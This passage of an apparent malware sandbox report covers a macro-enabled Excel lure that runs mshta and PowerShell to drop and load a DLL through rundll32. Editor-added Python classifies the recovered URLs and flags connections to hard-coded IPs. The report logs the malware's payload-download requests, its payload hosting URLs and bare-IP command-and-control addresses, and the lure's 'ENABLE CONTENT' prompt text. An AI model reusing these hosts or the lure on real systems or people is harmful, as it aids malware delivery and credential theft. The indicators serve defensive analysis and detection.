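    'cert_policy_noise' and 'unclassified'."""
    per_proc = defaultdict(set)
    for line in lines:
        m = _HIT.match(line.strip())
        if m:
            per_proc[m.group("proc").lower()].add(m.group("url"))

    out = {"payload_url": set(), "c2_candidate": set(),
           "cert_policy_noise": set(), "unclassified": set()}
    for proc, urls in per_proc.items():
        # "<url>/PE" is the URL plus adjacent memory bytes (the request sent
        # to weezual.fr carries no such suffix); fold it into the bare URL
        # whenever the bare URL was also recovered.
        urls = {u[:-2] if u.endswith("/PE") and u[:-2] in urls else u for u in urls}
        # A hit that is a strict prefix of another hit is a truncated read.
        urls = {u for u in urls if not any(o != u and o.startswith(u) for o in urls)}
        for u in urls:
            host = _host(u)
            if host in CERT_POLICY_HOSTS:
                out["cert_policy_noise"].add(u)
            elif _is_ip(host):
                # Bare-IP URL in the unpacked module's memory: C2 candidate.
                out["c2_candidate"].add(u)
            elif proc.startswith("powershell"):
                # URLs held by the downloader stage: payload hosting sites.
                out["payload_url"].add(u)
            else:
                out["unclassified"].add(u)
    return {k: sorted(v) for k, v in out.items()}


# Constructed input: a subset of the report's entries, reproduced verbatim.
_PS = ("Source: powershell.exe, 00000006.00000002.680618070.0000000003795000."
       "00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ")
_RD = ("Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000."
       "00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ")
REPORT_LINES = [
    _PS + "http://sep.dfwso",
    _PS + "http://sep.dfwsolar.club/hzh3v/z",
    _PS + "http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/",
    _PS + "http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE",
    _PS + "http://weezual.f",
    _PS + "http://weezual.fr",
    _PS + "http://weezual.fr/ju9c/twEHJDCvN",
    _PS + "http://weezual.fr/ju9c/twEHJDCvNwGimD/",
    _PS + "http://weezual.fr/ju9c/twEHJDCvNwGimD/PE",
    _RD + "http://www.digicert.com.my/cps.htm02",
    _RD + "https://160.16.102.168/",
    _RD + "https://160.16.102.168:80/AUhFYYAjKIJ",
]

if __name__ == "__main__":
    for stage, urls in normalize_iocs(REPORT_LINES).items():
        print(stage, *urls, sep="\n  ")
```

One detail worth keeping when these indicators are turned into blocks: the rundll32 string pairs an https:// scheme with port 80, so a proxy policy that only inspects TLS on 443 would not see this C2 attempt.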
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
Source: unknown DNS traffic detected: queries for: weezual.fr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected:
    GET /cc/vv/fe.html HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /cc/vv/fe.png HTTP/1.1
    Host: 91.240.118.172
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1
    Host: weezual.fr
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1
    Host: mycloud.suplitecmo.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    date: Fri, 28 Jan 2022 19:39:50 GMT
    content-type: text/html; charset=iso-8859-1
    content-length: 261
    server: Apache
    x-iplb-request-id: 66818F3D:C011_D5BA2104:0050_61F44686_C83C:4CC4
    x-iplb-instance: 31947
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172 (16 entries)
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168 (10 entries)
Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
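The "TCP traffic detected without corresponding DNS query" entries and the GET requests whose Host header is the literal address 91.240.118.172 are two sides of the same behaviour: the first stage and the C2 stage both connect to hard-coded IPs instead of names. The Python below is an editor-added example, not part of the sandbox report, that implements the same check over DNS and connection logs and aggregates the hits per destination the way the report does. The event records are constructed from the traffic listed above (203.0.113.10 is a documentation address standing in for whatever weezual.fr resolved to), and the field names are assumptions to be mapped onto real log schemas.

```python
"""Flag connections to IPs that no DNS answer produced, and HTTP requests
whose Host header is a bare IP.

Added example, not part of the sandbox report.  The events below are
constructed from the traffic the report lists; field names are assumptions.
"""
import ipaddress
from collections import defaultdict


def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except (ValueError, TypeError):
        return False


def detect_direct_ip(events):
    """Return one finding per connection whose destination was never returned
    by a DNS answer seen earlier in the stream, or whose HTTP Host header is a
    bare IP.  Events carry 'ts' and 'type' in {'dns', 'conn'}."""
    resolved = set()  # every IP any DNS answer has returned so far
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "dns":
            resolved.update(ev["answers"])
            continue
        reasons = []
        if ev["dst"] not in resolved:
            reasons.append("no_dns_answer")
        if _is_ip(ev.get("host")):
            reasons.append("ip_host_header")
        if reasons:
            findings.append({"ts": ev["ts"], "dst": ev["dst"], "port": ev["port"],
                             "uri": ev.get("uri"), "reasons": reasons})
    return findings


def summarize_direct_ip(events):
    """Aggregate findings per (dst, port), mirroring the report's repeated
    'TCP traffic detected without corresponding DNS query' entries."""
    summary = defaultdict(lambda: {"count": 0, "reasons": set()})
    for f in detect_direct_ip(events):
        entry = summary[(f["dst"], f["port"])]
        entry["count"] += 1
        entry["reasons"].update(f["reasons"])
    return dict(summary)


# Constructed events.  203.0.113.10 is a documentation address standing in for
# whatever weezual.fr resolved to; the two bare IPs are the ones in the report.
EVENTS = [
    {"ts": 1, "type": "dns", "qname": "weezual.fr", "answers": ["203.0.113.10"]},
    {"ts": 2, "type": "conn", "dst": "203.0.113.10", "port": 80,
     "host": "weezual.fr", "uri": "/ju9c/twEHJDCvNwGimD/"},
    {"ts": 3, "type": "conn", "dst": "91.240.118.172", "port": 80,
     "host": "91.240.118.172", "uri": "/cc/vv/fe.html"},
    {"ts": 4, "type": "conn", "dst": "91.240.118.172", "port": 80,
     "host": "91.240.118.172", "uri": "/cc/vv/fe.png"},
    {"ts": 5, "type": "conn", "dst": "160.16.102.168", "port": 80,
     "host": None, "uri": None},
]

if __name__ == "__main__":
    for (dst, port), info in summarize_direct_ip(EVENTS).items():
        print(f"{dst}:{port} x{info['count']} {sorted(info['reasons'])}")
```

Two caveats apply outside a sandbox. A host that resolved a name before log collection started, or that hits an IP cached from an earlier lookup, will also show "no_dns_answer", so either warm up the resolved set over a long look-back window or weight the "ip_host_header" reason higher; it does not depend on DNS visibility at all. Conversely, some legitimate updaters and telemetry endpoints do use hard-coded addresses, so this is a hunting signal to be combined with the process context, not a block rule on its own.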

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 16.2.rundll32.exe.2d30000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ef0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e50000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d00000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3050000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2470000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3030000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e20000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.950000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2bd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2520000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d90000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.980000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2df0000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.29e0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2df0000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet: LINKO contains: mshta
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI 23 24 25 26 27
Source: NZW-010122 BNUV-280122.xlsm Stream path 'Workbook' : binary BIFF workbook stream; readable fragments are the name 'xXx' in the header, repeated font entries 'Calibri' and 'Calibri Light', and standard number-format strings (#,##0, #,##0.00 and their [Red] variants)
Source: NZW-010122 BNUV-280122.xls.0.dr Stream path 'Workbook' : the same stream in the copy Excel wrote during analysis; identical apart from the header name, which reads 'user' (the sandbox account) instead of 'xXx'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: NZW-010122 BNUV-280122.xlsm Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
